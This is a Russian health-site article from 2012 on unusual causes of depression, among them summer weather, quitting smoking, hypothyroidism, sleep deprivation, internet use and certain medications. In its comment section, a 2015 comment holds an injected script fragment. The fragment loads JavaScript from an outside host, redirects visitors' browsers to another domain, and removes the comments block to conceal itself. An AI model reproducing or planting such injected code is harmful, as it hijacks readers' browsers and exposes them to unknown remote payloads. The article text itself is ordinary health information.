Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Причины депрессии, о кото...  >>  Причины депрессии, о которых вы не подозревали. Часть 1
 
Обратная связь
 

Причины депрессии, о которых вы не подозревали. Часть 1

Размер шрифта
12 июля 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Как известно, депрессия может быть вызвана потерей близкого человека, финансовыми трудностями, увольнением с работы или заболеванием. Однако существуют и другие, необычные, причины депрессии.

депрессия

Что такое депрессия

Депрессия – это психическое расстройство, которое характеризуется тремя основными симптомами:

  • снижением настроения;
  • нарушением мышления (замедление мыслительных процессов, негативные мысли, пессимистический взгляд на происходящее);
  • двигательной заторможенностью.

Как мы уже сказали, развитие депрессии могут спровоцировать разные факторы, о которых всем хорошо известно. Но существуют и другие, малоизвестные, причины депрессии.

1. Теплое время года

Как правило, депрессия развивается в холодное время года. Однако у некоторых людей наблюдается противоположный эффект: депрессия у них развивается в теплое время года.

По мнению психиатров, причина такой депрессии кроется в том, что организм этих людей не может быстро приспособиться к изменению погоды. Это может быть обусловлено нарушением соотношения различных веществ в головном мозге.

2. Курение

Считается, что люди, склонные к депрессии, берутся за сигарету чаще, чем люди, которые не испытывают подобных проблем. Никотин влияет на активность различных веществ в головном мозге, что приводит к повышению уровня дофамина и серотонина. Именно такой механизм действия имеют антидепрессанты. Вот почему у людей, которые бросают курить, появляются перепады настроения и даже может развиться депрессия.

3. Заболевание щитовидной железы

Заболевание, при котором щитовидная железа вырабатывает недостаточное количество гормонов, называется гипотиреоз. Одним из симптомов гипотиреоза является депрессия.

Гормоны щитовидной железы выполняют различные функции, в т.ч. участвуют в регуляции уровня серотонина – «гормона счастья».

Если депрессия сочетается с ощущением холода, запорами и усталостью, необходимо обратиться к врачу для исключения гипотиреоза.

4. Недосыпание

Не секрет, что плохой сон делает нас раздражительными, однако недосыпание может стать причиной депрессии.

Согласно данным исследования 2007 года, у здоровых людей при недосыпании рассматривание картинок негативного содержания приводило к появлению  в головном мозге такой же активности, которая наблюдается при депрессии.

5. Интернет

Согласно данным нескольких исследований, замена реального общения виртуальным (общение в чатах или социальных сетях) может привести к развитию депрессии, особенно у подростков. Когда человек все время общается по интернету, он лишен возможности выстраивать отношения с людьми и чувствует себя одиноким.

6. Лекарственные препараты

Депрессия является побочным эффектом многих лекарственных препаратов. К таким препаратам относятся: Роаккутан для лечения угревой сыпи (акне), Валиум для снятия тревоги, Липитор для уменьшения уровня холестерина и т.д.

Хотя при приеме этих препаратов депрессия встречается достаточно редко, все же перед их применением необходимо проконсультироваться с врачом. Только врач сможет определить риск развития депрессии при приеме того или иного препарата.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сладкие газировки вызывают депрессию   Признаки депрессии у близкого человека   Ботокс – спасение от депрессии   Болезни-близнецы. Депрессия и гипотиреоз  
01 апреля 2013Сладкие газировки вызывают депрессию 20 июля 2011Антидепрессанты приводят к депрессии
 
22 ноября 2012Ботокс – спасение от депрессии 24 февраля 2012Мигрень повышает риск депрессии у женщин
 

Слайдшоу

1
Вся правда о депрессии
Супереда против депрессии
Мифы и факты о депрессии

Тесты

Что вы знаете о депрессии?
Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.